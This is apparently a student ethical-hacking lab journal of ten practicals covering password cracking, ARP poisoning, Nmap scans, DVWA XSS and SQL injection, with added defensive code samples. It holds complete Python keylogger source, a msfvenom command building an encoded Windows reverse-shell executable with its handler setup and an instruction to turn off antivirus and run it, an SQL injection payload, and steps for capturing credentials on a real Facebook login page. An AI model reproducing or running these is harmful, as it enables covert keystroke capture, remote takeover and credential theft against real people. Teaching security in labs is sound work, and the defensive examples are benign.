EH Journal (2020) (E-Next - In)

02

Practical-1
Aim: Use Google and Whois for Reconnaissance

https://E-next.in
Practical-2
Aim:
a) Use CrypTool to encrypt and decrypt passwords using RC4 algorithm
b) Use Cain and Abel for cracking Windows account password using Dictionary attack
and to decode wireless network passwords.

Steps:
1. Install CrypTool from https://www.cryptool.org/en/ct1-downloads.

2. Enter the plain text.

3. To encrypt, click Encrypt/Decrypt > Symmetric (modern) > RC4.

4. Select the number of bits.

5. Click Encrypt.

6. To decrypt, again click Encrypt/Decrypt > Symmetric (modern) > RC4.

7. Select the number of bits.

8. Click Decrypt.

b) Use Cain and Abel for cracking Windows account password using dictionary attack
and to decode wireless network password.

1. Open the software, click on Cracker tab >> Hash Calculator tool as shown in the image.

2. A dialog box appears after clicking on Hash Calculator.
Add the text >> Calculate hash code >> Copy the MD5 hash value.

3. Click on MD5 Hashes >> Add list >> Paste the hash value.

4. Right-click on the hash code, then Dictionary Attack >> Add to list >> Start.

Match Found: Match not Found:

Practical-3
Aim: a) Run and analyze the output of the following commands in Linux:
ifconfig, ping, netstat, traceroute.
b) Perform ARP Poisoning in Windows

a) Linux Commands:

1. ifconfig

2. netstat

3. ping

4. traceroute

b) ARP Poisoning
Steps:
1) Click on Sniffer tab.

2) Click on Start/Stop Sniffer, give the range values, and click OK.

3) Right click on any IP and select Resolve Host Name.

4) Click on ARP tab on the bottom.

5) Click on Add Button(1) and select your router and any IP.

6) Click on the IP and then click on the button shown in the image to start ARP
Poisoning.

Practical – 4
Aim: Use NMap scanner to perform port scanning of various forms – ACK, SYN, FIN,
NULL, XMAS.

NOTE: Download Nmap for Windows and install it. After that, open cmd and type “nmap” to
check that it is installed properly. Then run the commands below.

• TCP ACK Scan (-sA)

It never determines open (or even open|filtered) ports. It is used to map out firewall
rulesets, determining whether they are stateful or not and which ports are filtered.

Command: nmap -sA -T4 scanme.nmap.org

• SYN (Stealth) Scan (-sS)

SYN scan is the default and most popular scan option for good reason. It can be
performed quickly, scanning thousands of ports per second on a fast network not
hampered by intrusive firewalls.

Command: nmap -p22,113,139 scanme.nmap.org

• FIN Scan (-sF)

Sets just the TCP FIN bit.

Command: nmap -sF -T4 para

• NULL Scan (-sN)

Does not set any bits (TCP flag header is 0).

Command: nmap -sN -p 22 scanme.nmap.org

• XMAS Scan (-sX)

Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.

Command: nmap -sX -T4 scanme.nmap.org
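
The flag combinations described above, seen from the receiving side, as an added example that is not part of the original journal: the script reads the flag byte of each TCP header and labels the probe, remembering earlier SYNs so that a bare ACK with no prior SYN stands out the way it does to a stateful firewall. The headers, ports and function names are constructed, and flow tracking is reduced to port pairs.

```python
import struct

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def tcp_header(sport, dport, flags):
    """Build a constructed 20-byte TCP header (checksum left at 0)."""
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 1024, 0, 0)


def parse_tcp(header):
    """Return (source port, destination port, flag bits) from raw bytes."""
    if len(header) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, _seq, _ack, _offset, flags = struct.unpack("!HHIIBB", header[:14])
    return sport, dport, flags & 0x3F  # keep the six classic flag bits


def classify(segments):
    """Label each inbound segment; track SYNs so a bare ACK can be judged."""
    opened = set()  # (sport, dport) pairs that started with a SYN
    labels = []
    for raw in segments:
        sport, dport, flags = parse_tcp(raw)
        if flags == 0:
            label = "NULL probe (-sN)"
        elif flags == FIN | PSH | URG:
            label = "XMAS probe (-sX)"
        elif flags == FIN:  # a normal close carries FIN together with ACK
            label = "FIN probe (-sF)"
        elif flags == SYN:
            opened.add((sport, dport))
            label = "SYN (connection attempt or -sS)"
        elif flags == ACK and (sport, dport) not in opened:
            label = "unsolicited ACK (-sA)"
        else:
            label = "consistent with an open flow"
        labels.append(label)
    return labels


# Constructed sample traffic arriving at one host on port 22.
SAMPLE = [
    tcp_header(40001, 22, SYN),
    tcp_header(40001, 22, ACK),              # follows its own SYN
    tcp_header(40002, 22, ACK),              # no SYN seen first
    tcp_header(40003, 22, FIN),
    tcp_header(40004, 22, 0),
    tcp_header(40005, 22, FIN | PSH | URG),
]
```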

Practical-5
Aim: a) Use Wireshark (Sniffer) to capture network traffic and analyze
b) Use Nemesy to launch DoS attack

a) Use Wireshark (Sniffer) to capture network traffic and analyze


Steps:

1. Open Wireshark and select your Connection.

2. Open any HTTP website and apply the display filter http.

3. Right Click on the POST method >> Follow >> TCP stream.

4. Search for ‘credentials’ in the dialog box.

Practical – 6
Aim: Simulate persistent cross-site scripting attack.

Steps:
1. Extract the DVWA zip file.
2. Copy the folder and paste it in Drive C: > xampp > htdocs.
3. Rename the folder to DVWA.
4. Go into the config folder and rename the config file to config.inc.php.
5. Open Chrome and go to localhost/DVWA.
6. Click on create/reset database. The database will be created. Click on login.

7. Username = “Admin” and Password = “password”. Click on login.

8. Click on DVWA security and set the security to low.

9. Click on XSS (Stored), write the script, and click on Sign Guestbook. The script will be
executed whenever the page is reloaded.
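
Why the script in step 9 runs on every reload, and the fix, as an added example that is not part of the original journal and is not DVWA's code: a Python stand-in for the guestbook that stores entries and renders them once without and once with output encoding. The table layout, function names and the sample entry are constructed.

```python
import html
import sqlite3


def new_guestbook():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE guestbook (name TEXT, comment TEXT)")
    return db


def sign_guestbook(db, name, comment):
    # Storage uses bound parameters; the flaw shown here is in rendering.
    db.execute("INSERT INTO guestbook VALUES (?, ?)", (name, comment))


def entries(db):
    query = "SELECT name, comment FROM guestbook ORDER BY rowid"
    return db.execute(query).fetchall()


def render_vulnerable(db):
    """Stored text is pasted into the page as markup (the flawed pattern)."""
    return "".join(
        f"<div>Name: {n}<br>Message: {c}</div>" for n, c in entries(db)
    )


def render_escaped(db):
    """Stored text is HTML-encoded at output, so it displays as text."""
    return "".join(
        f"<div>Name: {html.escape(n)}<br>Message: {html.escape(c)}</div>"
        for n, c in entries(db)
    )


def demo():
    db = new_guestbook()
    sign_guestbook(db, "visitor", "hello")
    sign_guestbook(db, "test", "<script>alert(1)</script>")  # constructed input
    # Two renders model two page loads: the stored entry comes back each time.
    return render_vulnerable(db), render_vulnerable(db), render_escaped(db)
```

Encoding at output is the primary fix; a Content-Security-Policy that disallows inline scripts limits the damage if one output path is missed.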

Practical – 7
Aim: Session impersonation using Firefox and Tamper Data add-on.
Steps:
1. Open Firefox.
2. Go to Tools > Add-ons > Extensions.
3. Search for and install Tamper Data.
4. Go to the Facebook login page.
5. Now click on the Tamper Data add-on and start tampering the data.
6. Now enter the username and password in the Facebook login page.
7. Your username and password have been captured using session impersonation.

8. Select a website for tampering data, e.g. (razorba).

9. Select any item to buy.

10. Then click on add-cart.
11. Then click on Tamper Data (add-on).

12. Refresh the page to get the extension.

13. Click on OK.

14. Change values in the Cookie option to tamper the data.

15. Then click on OK and see that the data has been tampered.
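
Steps 14 and 15 succeed only when the server accepts cookie values it has no way to verify. The server-side countermeasure, as an added example that is not part of the original journal: the cookie carries an HMAC tag, and any value edited in transit fails verification. The key, cookie layout, field names and function names are constructed.

```python
import base64
import hashlib
import hmac
import json

SECRET = b"constructed-demo-key"  # assumption: kept server-side only


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode()


def _encode(payload: dict) -> bytes:
    return json.dumps(payload, sort_keys=True, separators=(",", ":")).encode()


def issue_cookie(payload: dict, key: bytes = SECRET) -> str:
    """Return 'body.tag', where tag = HMAC-SHA256(key, body)."""
    body = _encode(payload)
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return _b64(body) + "." + _b64(tag)


def read_cookie(cookie: str, key: bytes = SECRET):
    """Return the payload, or None if the cookie is malformed or altered."""
    try:
        body_b64, tag_b64 = cookie.split(".")
        body = base64.urlsafe_b64decode(body_b64)
        tag = base64.urlsafe_b64decode(tag_b64)
    except ValueError:  # wrong part count or invalid base64
        return None
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        return None
    return json.loads(body)


def edit_in_transit(cookie: str, **changes) -> str:
    """Constructed stand-in for step 14: fields change, the old tag stays."""
    body_b64, tag_b64 = cookie.split(".")
    payload = json.loads(base64.urlsafe_b64decode(body_b64))
    payload.update(changes)
    return _b64(_encode(payload)) + "." + tag_b64
```

Signing detects modification only; values that must not be client-controlled at all, such as prices, are better looked up server-side from the item identifier.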

Practical – 8
Aim: Perform SQL injection attack.
Steps:
1. Extract the DVWA zip file.
2. Copy the folder and paste it in Drive C: > xampp > htdocs.
3. Rename the folder to DVWA.
4. Go into the config folder and rename the config file to config.inc.php.
5. Open Chrome and go to localhost/DVWA.
6. Click on create/reset database. The database will be created. Click on login.

7. Username = “Admin” and Password = “password”. Click on login.

8. Click on DVWA security and set the security to low.

9. Click on SQL Injection.


10. In User Id enter 1 and click on submit.

11. Type 1' or true;# and click on submit.

Practical – 9
Aim: Create a simple keylogger using python
Code:
from pynput.keyboard import Key, Listener
import logging
# if no name it gets into an empty string
log_dir = ""
# This is a basic logging function
logging.basicConfig(filename=(log_dir+"key_log.txt"), level=logging.DEBUG,
                    format='%(asctime)s:%(message)s:')
# This is from the library
def on_press(key):
    logging.info(str(key))
# This says, listener is on
with Listener(on_press=on_press) as listener:
    listener.join()

Output:

Practical – 10
Aim: Using Metasploit to exploit (Kali Linux).

Steps:
Boot Kali Linux from a pen drive on the PC.
Open Metasploit and type the exit command to quit.
The directory will change to root@kali.
Type the following commands.

1. msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.9.191 LPORT=31337 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
2. msfconsole
3. use exploit/multi/handler
4. msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
5. payload => windows/shell/reverse_tcp
6. show options
7. msf exploit(multi/handler) > set LHOST 192.168.9.191
8. LHOST => 192.168.9.191
9. msf exploit(multi/handler) > set LPORT 31337
10. LPORT => 31337
11. msf exploit(multi/handler) > exploit

PUT THE PAYLOAD GENERATED IN A WINDOWS PC (MAKE SURE ANTIVIRUS IS OFF) AND RUN THE EXE FILE.
